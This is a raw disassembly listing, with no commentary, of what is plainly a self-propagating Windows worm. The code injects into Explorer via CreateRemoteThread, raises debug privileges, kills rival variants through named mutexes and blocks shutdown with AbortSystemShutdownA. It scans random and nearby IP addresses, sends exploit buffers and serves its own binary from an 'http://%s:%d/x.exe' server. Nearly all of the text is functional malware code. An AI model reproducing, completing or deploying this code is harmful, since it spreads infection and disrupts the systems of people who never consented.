; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A0h push offset dword_31424868 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp [ebp+arg_0], 0 jz loc_31421CE7 push 68h lea eax, [ebp+var_89E4] push offset dword_31424A20 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4834] push 1B5Ah push eax lea eax, [ebp+var_897C] push eax call sub_31422CE2 ; memcpy push 70h lea eax, [ebp+var_690C] push offset dword_31424A8C push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_37A0] push 0A5Eh push eax lea eax, [ebp+var_689C] push eax call sub_31422CE2 ; memcpy push 84h lea eax, [ebp+var_5DD8] push offset dword_31424B00 push eax call sub_31422CE2 ; memcpy add esp, 3Ch lea eax, [ebp+var_89E4] push 0 push 10FCh push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0FDCh lea eax, [ebp+var_690C] jmp loc_31421D3F ; --------------------------------------------------------------------------- loc_31421BF7: ; CODE XREF: sub_31421801+22Bj push 0DACh lea eax, [ebp+var_2CD8] push 90h push eax mov [ebp+arg_0], 1 call sub_31422CD6 ; memset push 4 lea eax, [ebp+var_24F4] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_24E4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21C0] push offset loc_31424C70 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21BC] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy add esp, 40h push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_21B0] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 10h xor ecx, ecx lea eax, [ebp+var_4833] loc_31421C93: ; CODE XREF: sub_31421801+4A8j mov dl, [ebp+ecx+var_2CD8] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 0DACh jl short loc_31421C93 and [ebp+var_2CDC], 0 and [ebp+var_2CDB], 0 push 1C52h lea eax, [ebp+var_89E4] push 31h push eax call sub_31422CD6 ; memset push 1C52h lea eax, [ebp+var_690C] push 31h push eax call sub_31422CD6 ; memset add esp, 18h jmp loc_31421A98 ; --------------------------------------------------------------------------- loc_31421CE7: ; CODE XREF: sub_31421801+339j push 7Ch lea eax, [ebp+var_1F28] push offset dword_3142490C push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_F44] push 7D0h push eax lea eax, [ebp+var_1EAC] push eax call sub_31422CE2 ; memcpy push 90h lea eax, [ebp+var_16DC] push offset dword_3142498C push eax call sub_31422CE2 ; memcpy add esp, 24h and [ebp+var_1231], 0 lea eax, [ebp+var_1F28] push 0 push 0CF8h loc_31421D3F: ; CODE XREF: sub_31421801+3F1j push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep and [ebp+var_C], 0 loc_31421D4C: ; CODE XREF: sub_31421801+1ADj ; sub_31421801+1E1j ... push 2 push [ebp+var_4] call dword_31421170 ; shutdown loc_31421D57: ; CODE XREF: sub_31421801+166j push [ebp+var_4] call dword_31421174 ; closesocket pop esi loc_31421D61: ; CODE XREF: sub_31421801+37j mov eax, [ebp+var_C] pop edi pop ebx leave retn sub_31421801 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376p var_1C = dword ptr -1Ch var_18 = byte ptr -18h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 1Ch push esi push edi push offset aAdvapi32 ; "advapi32" call dword_314210A8 ; LoadLibraryA mov esi, dword_314210A4 mov edi, eax push offset aOpenprocesstok ; "OpenProcessToken" push edi call esi ; GetProcAddress test eax, eax mov [ebp+var_4], eax jz short loc_31421DEC push offset aLookupprivileg ; "LookupPrivilegeValueA" push edi call esi ; GetProcAddress test eax, eax mov [ebp+var_8], eax jz short loc_31421DEC push offset aAdjusttokenpri ; "AdjustTokenPrivileges" push edi call esi ; GetProcAddress mov esi, eax test esi, esi jz short loc_31421DEC lea eax, [ebp+var_C] push eax push 20h call dword_314210A0 ; GetCurrentProcess push eax call [ebp+var_4] lea eax, [ebp+var_18] mov [ebp+var_1C], 1 push eax push offset aSedebugprivile ; "SeDebugPrivilege" push 0 mov [ebp+var_10], 2 call [ebp+var_8] push 0 push 0 lea eax, [ebp+var_1C] push 10h push eax push 0 push [ebp+var_C] call esi ; GetProcAddress loc_31421DEC: ; CODE XREF: sub_31421D68+28j ; sub_31421D68+37j ... pop edi pop esi leave retn sub_31421D68 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421DF0 proc near ; CODE XREF: UPX0:3142238Ap var_18 = byte ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 18h mov ecx, dword_31425000 and [ebp+var_4], 0 push ebx push esi mov eax, [ecx+3Ch] push edi add eax, ecx push offset aKernel32 ; "kernel32" mov ecx, [eax+34h] mov edi, [eax+50h] mov [ebp+var_C], ecx call dword_314210B4 ; GetModuleHandleA mov esi, dword_314210A4 mov ebx, eax push offset aVirtualallocex ; "VirtualAllocEx" push ebx call esi ; GetProcAddress test eax, eax mov [ebp+var_10], eax jnz short loc_31421E37 loc_31421E33: ; CODE XREF: sub_31421DF0+54j push 1 jmp short loc_31421E88 ; --------------------------------------------------------------------------- loc_31421E37: ; CODE XREF: sub_31421DF0+41j push offset aCreateremoteth ; "CreateRemoteThread" push ebx call esi ; GetProcAddress test eax, eax mov [ebp+var_14], eax jz short loc_31421E33 push 0 push offset aShell_traywnd ; "Shell_TrayWnd" call dword_31421110 ; FindWindowA test eax, eax jnz short loc_31421E65 call dword_31421114 ; GetForegroundWindow test eax, eax jnz short loc_31421E65 push 2 jmp short loc_31421E88 ; --------------------------------------------------------------------------- loc_31421E65: ; CODE XREF: sub_31421DF0+65j ; sub_31421DF0+6Fj lea ecx, [ebp+var_8] push ecx push eax call dword_31421118 ; GetWindowThreadProcessId push [ebp+var_8] push 0 push 42Ah call dword_314210B0 ; OpenProcess mov ebx, eax test ebx, ebx jnz short loc_31421E8B push 3 loc_31421E88: ; CODE XREF: sub_31421DF0+45j ; sub_31421DF0+73j pop eax jmp short loc_31421EF6 ; --------------------------------------------------------------------------- loc_31421E8B: ; CODE XREF: sub_31421DF0+94j push 4 push 3000h push edi push [ebp+var_C] push ebx call [ebp+var_10] mov esi, dword_3142107C test eax, eax jz short loc_31421EE9 lea ecx, [ebp+var_10] push ecx push edi push eax push eax push ebx call dword_314210AC ; WriteProcessMemory push dword_31424FF4 call esi ; CloseHandle lea eax, [ebp+var_18] xor edi, edi push eax push edi push 1 push [ebp+arg_0] push edi push edi push ebx call [ebp+var_14] cmp eax, edi jz short loc_31421ED5 push eax call esi ; CloseHandle jmp short loc_31421EF0 ; --------------------------------------------------------------------------- loc_31421ED5: ; CODE XREF: sub_31421DF0+DEj push offset aUterm19 ; "uterm19" call sub_31421F29 pop ecx mov [ebp+var_4], 5 jmp short loc_31421EF0 ; --------------------------------------------------------------------------- loc_31421EE9: ; CODE XREF: sub_31421DF0+B2j mov [ebp+var_4], 4 loc_31421EF0: ; CODE XREF: sub_31421DF0+E3j ; sub_31421DF0+F7j push ebx call esi ; CloseHandle mov eax, [ebp+var_4] loc_31421EF6: ; CODE XREF: sub_31421DF0+99j pop edi pop esi pop ebx leave retn sub_31421DF0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421EFB proc near ; CODE XREF: sub_314221C4+Bp ; UPX0:3142234Cp ... var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx push ebx push esi push edi pusha rdtsc mov [ebp+var_8], eax popa mov [ebp+var_4], esp call dword_314210B8 ; GetTickCount mov ecx, [ebp+var_4] imul ecx, [ebp+var_8] add eax, ecx push eax call dword_314210EC ; srand pop ecx pop edi pop esi pop ebx leave retn sub_31421EFB endp ; =============== S U B R O U T I N E ======================================= sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EAp ; UPX0:31422356p ... arg_0 = dword ptr 4 push [esp+arg_0] push 1 push 0 call dword_314210BC ; CreateMutexA retn sub_31421F29 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421F38 proc near ; CODE XREF: sub_314223B2+155p ; sub_314223B2+160p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax xor eax, eax push eax push [ebp+arg_4] push [ebp+arg_0] push eax push eax call dword_314210C0 ; CreateThread pop ebp retn sub_31421F38 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421F52 proc near ; CODE XREF: sub_314221C4+12Cp ; sub_314225C3+5Ap ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax xor eax, eax push eax push [ebp+arg_4] push [ebp+arg_0] push eax push eax call dword_314210C0 ; CreateThread push eax call dword_3142107C ; CloseHandle pop ebp retn sub_31421F52 endp ; =============== S U B R O U T I N E ======================================= sub_31421F73 proc near ; CODE XREF: sub_314211A0+68p ; sub_31422A9B+3Bp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx mov ebx, [esp+4+arg_0] push esi push edi mov edi, [esp+0Ch+arg_4] xor esi, esi test edi, edi jle short loc_31421F9B loc_31421F84: ; CODE XREF: sub_31421F73+26j call dword_314210FC ; rand push 1Ah cdq pop ecx idiv ecx add dl, 61h mov [esi+ebx], dl inc esi cmp esi, edi jl short loc_31421F84 loc_31421F9B: ; CODE XREF: sub_31421F73+Fj and byte ptr [ebx+edi], 0 pop edi pop esi pop ebx retn sub_31421F73 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105p var_54 = dword ptr -54h var_24 = word ptr -24h var_10 = dword ptr -10h var_C = dword ptr -0Ch arg_0 = dword ptr 8 arg_4 = word ptr 0Ch push ebp mov ebp, esp sub esp, 54h push esi push edi push 44h xor esi, esi pop edi lea eax, [ebp+var_54] push edi push esi push eax call sub_31422CD6 ; memset mov ax, [ebp+arg_4] add esp, 0Ch mov [ebp+var_24], ax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_54] push eax push esi push esi push esi push esi push esi push esi mov [ebp+var_54], edi push [ebp+arg_0] push esi call dword_314210C4 ; CreateProcessA push [ebp+var_C] mov esi, dword_3142107C mov edi, eax call esi ; CloseHandle push [ebp+var_10] call esi ; CloseHandle mov eax, edi pop edi pop esi leave retn sub_31421FA3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3Ep ; sub_31422712+7p ... var_34 = byte ptr -34h push ebp mov ebp, esp sub esp, 34h lea eax, [ebp+var_34] push 31h push eax call dword_3142114C ; gethostname cmp eax, 0FFFFFFFFh jnz short loc_3142201A call dword_31421150 ; WSAGetLastError xor eax, eax leave retn ; --------------------------------------------------------------------------- loc_3142201A: ; CODE XREF: sub_31421FF9+15j lea eax, [ebp+var_34] push eax call dword_31421154 ; gethostbyname test eax, eax jnz short loc_3142202F mov eax, 100007Fh leave retn ; --------------------------------------------------------------------------- loc_3142202F: ; CODE XREF: sub_31421FF9+2Dj mov eax, [eax+0Ch] mov eax, [eax] mov eax, [eax] leave retn sub_31421FF9 endp ; =============== S U B R O U T I N E ======================================= sub_31422038 proc near ; CODE XREF: sub_314216A2+12p ; sub_3142255F+22p ... var_4 = byte ptr -4 push ecx lea eax, [esp+4+var_4] push 0 push eax call dword_31421130 ; InternetGetConnectedState neg eax sbb eax, eax neg eax pop ecx retn sub_31422038 endp ; =============== S U B R O U T I N E ======================================= sub_3142204E proc near ; CODE XREF: sub_314223B2+E6p arg_0 = dword ptr 4 push [esp+arg_0] push 0 push 2 call dword_314210CC ; OpenEventA test eax, eax jz short locret_31422067 push eax call dword_314210C8 ; SetEvent locret_31422067: ; CODE XREF: sub_3142204E+10j retn sub_3142204E endp ; =============== S U B R O U T I N E ======================================= sub_31422068 proc near ; CODE XREF: sub_314216A2+68p push esi mov esi, dword_314210FC push edi call esi ; rand mov edi, eax shl edi, 10h call esi ; rand or eax, edi pop edi pop esi retn sub_31422068 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142207E proc near ; DATA XREF: sub_314221C4+127o var_200 = byte ptr -200h var_100 = byte ptr -100h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 200h push ebx mov ebx, [ebp+arg_0] push esi push edi xor edi, edi lea eax, [ebp+var_100] push edi push 100h push eax push ebx call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jnz short loc_314220AF push 1 jmp loc_3142216A ; --------------------------------------------------------------------------- loc_314220AF: ; CODE XREF: sub_3142207E+28j mov esi, dword_31421104 lea eax, [ebp+var_100] push offset aGet ; "GET" push eax call esi ; strstr pop ecx test eax, eax pop ecx jz loc_3142217A lea eax, [ebp+var_100] push offset dword_314241F0 push eax call esi ; strstr pop ecx test eax, eax pop ecx jz loc_3142217A mov esi, dword_31421168 push 0 push 3Dh push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"... push ebx call esi ; send push dword_31424FF0 lea eax, [ebp+var_200] push offset aContentLengthU ; "Content-Length: %u\r\n\r\n" push eax call dword_3142111C ; wsprintfA add esp, 0Ch lea eax, [ebp+var_200] push 0 push eax call sub_31422CDC ; strlen pop ecx push eax lea eax, [ebp+var_200] push eax push ebx call esi ; send loc_3142212C: ; CODE XREF: sub_3142207E+E8j mov eax, dword_31424FF0 mov ecx, 1000h sub eax, edi cmp eax, ecx jb short loc_3142213E mov eax, ecx loc_3142213E: ; CODE XREF: sub_3142207E+BCj test eax, eax jz short loc_3142216D push 0 push eax mov eax, dword_31424FE8 add eax, edi push eax push ebx call esi ; send cmp eax, 0FFFFFFFFh jz short loc_31422168 cmp eax, 1000h jb short loc_3142216D push 64h add edi, eax call dword_31421094 ; Sleep jmp short loc_3142212C ; --------------------------------------------------------------------------- loc_31422168: ; CODE XREF: sub_3142207E+D5j push 2 loc_3142216A: ; CODE XREF: sub_3142207E+2Cj pop eax jmp short loc_314221BD ; --------------------------------------------------------------------------- loc_3142216D: ; CODE XREF: sub_3142207E+C2j ; sub_3142207E+DCj push offset dword_31424FEC call dword_314210D4 ; InterlockedIncrement jmp short loc_31422198 ; --------------------------------------------------------------------------- loc_3142217A: ; CODE XREF: sub_3142207E+49j ; sub_3142207E+61j mov esi, dword_31421168 push 0 push 15h push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n" push ebx call esi ; send push 0 push 3 push offset dword_31424D38 push ebx call esi ; send loc_31422198: ; CODE XREF: sub_3142207E+FAj push 7D0h call dword_31421094 ; Sleep push 2 push ebx call dword_31421170 ; shutdown push ebx call dword_31421174 ; closesocket push 0 call dword_314210D0 ; ExitThread xor eax, eax loc_314221BD: ; CODE XREF: sub_3142207E+EDj pop edi pop esi pop ebx leave retn 4 sub_3142207E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314221C4 proc near ; DATA XREF: sub_314223B2+150o var_130 = byte ptr -130h var_28 = byte ptr -28h var_18 = word ptr -18h var_16 = word ptr -16h var_14 = dword ptr -14h var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 130h push ebx push edi call sub_31421EFB lea eax, [ebp+var_130] push 104h push eax push offset aCryptographicS ; "Cryptographic Service" xor ebx, ebx push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push 80000002h mov dword_31424FEC, ebx call sub_31422882 add esp, 14h test eax, eax jnz loc_314222F9 push esi push ebx push ebx push 3 push ebx push 1 lea eax, [ebp+var_130] push 80000000h push eax call dword_31421080 ; CreateFileA mov esi, eax cmp esi, 0FFFFFFFFh jnz short loc_31422230 push 1 call dword_314210D0 ; ExitThread loc_31422230: ; CODE XREF: sub_314221C4+62j push ebx push esi call dword_314210DC ; GetFileSize push eax mov dword_31424FF0, eax call sub_31422CA5 pop ecx mov dword_31424FE8, eax lea ecx, [ebp+var_4] push ebx push ecx push dword_31424FF0 push eax push esi call dword_314210D8 ; ReadFile mov eax, [ebp+var_4] push esi mov dword_31424FF0, eax call dword_3142107C ; CloseHandle push ebx push 1 push 2 call dword_31421158 ; socket push 10h mov edi, eax pop esi lea eax, [ebp+var_18] push esi push ebx push eax call sub_31422CD6 ; memset add esp, 0Ch mov [ebp+var_18], 2 mov [ebp+var_14], ebx loc_31422292: ; CODE XREF: sub_314221C4+E5j ; sub_314221C4+EDj ... call dword_314210FC ; rand add eax, 7D0h and eax, 1FFFh cmp al, bl mov dword_31424FFC, eax jz short loc_31422292 xor ecx, ecx mov cl, ah test cl, cl jz short loc_31422292 push eax call dword_31421160 ; ntohs mov [ebp+var_16], ax lea eax, [ebp+var_18] push esi push eax push edi call dword_31421140 ; bind test eax, eax jnz short loc_31422292 push 64h push edi call dword_31421144 ; listen mov [ebp+var_8], esi pop esi loc_314222DB: ; CODE XREF: sub_314221C4+133j lea eax, [ebp+var_8] push eax lea eax, [ebp+var_28] push eax push edi call dword_31421148 ; accept push eax push offset sub_3142207E call sub_31421F52 pop ecx pop ecx jmp short loc_314222DB ; --------------------------------------------------------------------------- loc_314222F9: ; CODE XREF: sub_314221C4+3Dj push ebx call dword_314210D0 ; ExitThread pop edi xor eax, eax pop ebx leave retn 4 sub_314221C4 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FCp var_190 = byte ptr -190h push ebp mov ebp, esp sub esp, 190h lea eax, [ebp+var_190] push esi mov esi, dword_3142113C push eax push 2 call esi ; WSAStartup lea eax, [ebp+var_190] push eax push 102h call esi ; WSAStartup pop esi leave retn sub_31422308 endp ; --------------------------------------------------------------------------- loc_31422334: ; CODE XREF: UPX1:31427D08j push 0 call dword_314210B4 ; GetModuleHandleA push offset aFtpupd_exe ; "ftpupd.exe" mov dword_31425000, eax call dword_31421074 ; DeleteFileA call sub_31421EFB push offset aUterm19 ; "uterm19" call sub_31421F29 pop ecx mov dword_31424FF4, eax call dword_314210E4 ; RtlGetLastWin32Error cmp eax, 0B7h jnz short loc_31422376 push 1 call dword_314210E0 ; ExitProcess loc_31422376: ; CODE XREF: UPX0:3142236Cj call sub_31421D68 call sub_314229E6 call sub_31422B67 push offset sub_314223B2 call sub_31421DF0 test eax, eax pop ecx jz short loc_3142239B push 0 call sub_314223B2 loc_3142239B: ; CODE XREF: UPX0:31422392j xor eax, eax retn ; =============== S U B R O U T I N E ======================================= sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525p ; sub_3142255F:loc_31422578p ... push 0 push dword_31424FF8 call dword_31421070 ; WaitForSingleObject neg eax sbb eax, eax inc eax retn sub_3142239E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314223B2 proc near ; CODE XREF: UPX0:31422396p ; DATA XREF: UPX0:31422385o var_74 = dword ptr -74h var_70 = dword ptr -70h var_6C = dword ptr -6Ch var_68 = dword ptr -68h var_64 = dword ptr -64h var_60 = dword ptr -60h var_5C = dword ptr -5Ch var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31421190 push offset loc_31422CD0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 64h push ebx push esi push edi mov [ebp+var_70], offset aU10x ; "u10x" mov [ebp+var_6C], offset aU11x ; "u11x" mov [ebp+var_68], offset aU12x ; "u12x" mov [ebp+var_64], offset aU13x ; "u13x" mov [ebp+var_60], offset aU14x ; "u14x" mov [ebp+var_5C], offset aU15x ; "u15x" mov [ebp+var_58], offset aU16x ; "u16x" mov [ebp+var_54], offset aU17x ; "u17x" mov [ebp+var_50], offset aU18x ; "u18x" mov [ebp+var_4C], offset aU8 ; "u8" mov [ebp+var_48], offset aU9 ; "u9" mov [ebp+var_44], offset aU10 ; "u10" mov [ebp+var_40], offset aU11 ; "u11" mov [ebp+var_3C], offset aU12 ; "u12" mov [ebp+var_38], offset aU13 ; "u13" mov [ebp+var_34], offset aU13i ; "u13i" mov [ebp+var_30], offset aU14 ; "u14" mov [ebp+var_2C], offset aU15 ; "u15" mov [ebp+var_28], offset aU16 ; "u16" mov [ebp+var_24], offset aU17 ; "u17" mov [ebp+var_20], offset aU18 ; "u18" mov [ebp+var_1C], offset aU19 ; "u19" push offset aU19x ; "u19x" xor edi, edi push edi push 1 push edi call dword_3142106C ; CreateEventA mov dword_31424FF8, eax mov [ebp+var_4], edi mov [ebp+var_74], edi loc_3142248B: ; CODE XREF: sub_314223B2+EFj cmp [ebp+var_74], 9 jnb short loc_314224A3 mov eax, [ebp+var_74] push [ebp+eax*4+var_70] call sub_3142204E pop ecx inc [ebp+var_74] jmp short loc_3142248B ; --------------------------------------------------------------------------- loc_314224A3: ; CODE XREF: sub_314223B2+DDj mov [ebp+var_74], edi loc_314224A6: ; CODE XREF: sub_314223B2+10Aj cmp [ebp+var_74], 0Dh jnb short loc_314224BE mov eax, [ebp+var_74] push [ebp+eax*4+var_4C] call sub_31421F29 pop ecx inc [ebp+var_74] jmp short loc_314224A6 ; --------------------------------------------------------------------------- loc_314224BE: ; CODE XREF: sub_314223B2+F8j cmp [ebp+arg_0], edi jz short loc_314224FC push offset aWs2_32 ; "ws2_32" mov esi, dword_314210A8 call esi ; LoadLibraryA push offset aWininet ; "wininet" call esi ; LoadLibraryA push offset aMsvcrt ; "msvcrt" call esi ; LoadLibraryA push offset aAdvapi32 ; "advapi32" call esi ; LoadLibraryA push offset aUser32 ; "user32" call esi ; LoadLibraryA push offset aUterm19 ; "uterm19" call sub_31421F29 pop ecx mov dword_31424FF4, eax loc_314224FC: ; CODE XREF: sub_314223B2+10Fj call sub_31422308 push edi push offset sub_314221C4 call sub_31421F38 push edi push offset sub_314216A2 call sub_31421F38 push edi push offset loc_3142276E call sub_31421F38 add esp, 18h loc_31422525: ; CODE XREF: sub_314223B2+18Ej call sub_3142239E test eax, eax jnz short loc_31422542 push edi call dword_31421018 ; AbortSystemShutdownA push 1388h call dword_31421094 ; Sleep jmp short loc_31422525 ; --------------------------------------------------------------------------- loc_31422542: ; CODE XREF: sub_314223B2+17Aj or [ebp+var_4], 0FFFFFFFFh call nullsub_2 xor eax, eax mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn 4 sub_314223B2 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142255F proc near ; DATA XREF: sub_314225C3+55o ; sub_3142264B+6Ao ... var_1 = byte ptr -1 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx cmp byte ptr [ebp+arg_0], 7Fh jnz short loc_3142256E push 1 pop eax jmp short locret_314225BF ; --------------------------------------------------------------------------- loc_3142256E: ; CODE XREF: sub_3142255F+8j mov al, byte ptr [ebp+arg_0+3] push ebx push esi mov [ebp+var_1], al xor bl, bl loc_31422578: ; CODE XREF: sub_3142255F+5Aj call sub_3142239E test eax, eax jnz short loc_314225BB call sub_31422038 test eax, eax jz short loc_314225BB cmp [ebp+var_1], bl jz short loc_314225B4 mov byte ptr [ebp+arg_0+3], bl push [ebp+arg_0] call sub_31421801 movzx esi, word_3142500C pop ecx call dword_314210FC ; rand cdq idiv esi add edx, esi push edx call dword_31421094 ; Sleep loc_314225B4: ; CODE XREF: sub_3142255F+2Ej inc bl cmp bl, 0FFh jb short loc_31422578 loc_314225BB: ; CODE XREF: sub_3142255F+20j ; sub_3142255F+29j pop esi xor eax, eax pop ebx locret_314225BF: ; CODE XREF: sub_3142255F+Dj leave retn 4 sub_3142255F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314225C3 proc near ; DATA XREF: sub_3142264B+7Eo ; UPX0:31422803o arg_0 = dword ptr 8 push ebp mov ebp, esp cmp byte ptr [ebp+arg_0], 7Fh jnz short loc_314225D1 push 1 pop eax jmp short loc_31422647 ; --------------------------------------------------------------------------- loc_314225D1: ; CODE XREF: sub_314225C3+7j push ebx push esi push edi call sub_31421EFB mov esi, dword_314210FC xor ebx, ebx loc_314225E1: ; CODE XREF: sub_314225C3+7Dj call sub_3142239E test eax, eax jnz short loc_31422642 call sub_31422038 test eax, eax jz short loc_31422642 call esi ; rand mov byte ptr [ebp+arg_0+2], al call esi ; rand push offset dword_31425004 mov byte ptr [ebp+arg_0+3], al call dword_314210D4 ; InterlockedIncrement push [ebp+arg_0] call sub_31421801 test eax, eax pop ecx jnz short loc_31422624 push [ebp+arg_0] push offset sub_3142255F call sub_31421F52 pop ecx pop ecx loc_31422624: ; CODE XREF: sub_314225C3+50j movzx edi, word_3142500C call esi ; rand cdq idiv edi add edx, edi push edx call dword_31421094 ; Sleep inc ebx cmp ebx, 8000h jl short loc_314225E1 loc_31422642: ; CODE XREF: sub_314225C3+25j ; sub_314225C3+2Ej pop edi pop esi xor eax, eax pop ebx loc_31422647: ; CODE XREF: sub_314225C3+Cj pop ebp retn 4 sub_314225C3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142264B proc near ; DATA XREF: UPX0:3142281Bo var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx call sub_31421EFB call sub_3142239E test eax, eax jnz loc_31422704 push ebx mov ebx, dword_31421094 push esi mov esi, dword_314210FC push edi loc_31422671: ; CODE XREF: sub_3142264B+48j ; sub_3142264B+B0j call esi ; rand mov byte ptr [ebp+var_4+1], al call esi ; rand mov byte ptr [ebp+var_4+3], al call esi ; rand mov byte ptr [ebp+var_4+2], al loc_31422680: ; CODE XREF: sub_3142264B+3Cj call esi ; rand cmp al, 7Fh mov byte ptr [ebp+var_4], al jz short loc_31422680 call sub_31421FF9 mov edi, [ebp+var_4] cmp edi, eax jz short loc_31422671 call sub_31422038 test eax, eax jz short loc_314226DC push offset dword_31425004 call dword_314210D4 ; InterlockedIncrement push edi call sub_31421801 test eax, eax pop ecx jnz short loc_314226E3 push edi push offset sub_3142255F call sub_31421F52 pop ecx mov [ebp+var_8], 4 pop ecx loc_314226C8: ; CODE XREF: sub_3142264B+8Dj push edi push offset sub_314225C3 call sub_31421F52 dec [ebp+var_8] pop ecx pop ecx jnz short loc_314226C8 jmp short loc_314226E3 ; --------------------------------------------------------------------------- loc_314226DC: ; CODE XREF: sub_3142264B+51j push 2710h call ebx ; Sleep loc_314226E3: ; CODE XREF: sub_3142264B+67j ; sub_3142264B+8Fj movzx edi, word_3142500C call esi ; rand cdq idiv edi add edx, edi push edx call ebx ; Sleep call sub_3142239E test eax, eax jz loc_31422671 pop edi pop esi pop ebx loc_31422704: ; CODE XREF: sub_3142264B+11j push 0 call dword_314210D0 ; ExitThread xor eax, eax leave retn 4 sub_3142264B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422712 proc near ; CODE XREF: UPX0:314227E0p ; UPX0:loc_31422846p var_50 = byte ptr -50h var_28 = byte ptr -28h push ebp mov ebp, esp sub esp, 50h push esi call sub_31421FF9 push eax call dword_3142115C ; inet_ntoa mov esi, dword_31421068 push eax lea eax, [ebp+var_28] push eax call esi ; lstrcpyA push dword_31424FFC lea eax, [ebp+var_28] push eax lea eax, [ebp+var_50] push offset aHttpSDX_exe ; "http://%s:%d/x.exe" push eax call dword_3142111C ; wsprintfA add esp, 10h lea eax, [ebp+var_50] push eax push offset word_314242BA call esi ; lstrcpyA push offset byte_314242B8 call dword_31421084 ; lstrlenA mov byte_314242B8[eax], 0DFh pop esi leave retn sub_31422712 endp ; --------------------------------------------------------------------------- loc_3142276E: ; DATA XREF: sub_314223B2+166o push ecx push ecx push ebx push ebp push esi xor ebx, ebx push edi mov dword_31425004, ebx call sub_31422038 mov esi, dword_31421094 mov edi, 1388h test eax, eax jnz short loc_3142279C loc_31422790: ; CODE XREF: UPX0:3142279Aj push edi call esi ; Sleep call sub_31422038 test eax, eax jz short loc_31422790 loc_3142279C: ; CODE XREF: UPX0:3142278Ej lea eax, [esp+14h] push ebx push eax call dword_31421130 ; InternetGetConnectedState test byte ptr [esp+14h], 2 push 50h mov dword_31425008, ebx pop ebp mov word_3142500C, 96h jz short loc_314227D9 mov dword_31425008, 1 mov ebp, 15Eh mov word_3142500C, 14h loc_314227D9: ; CODE XREF: UPX0:314227BFj 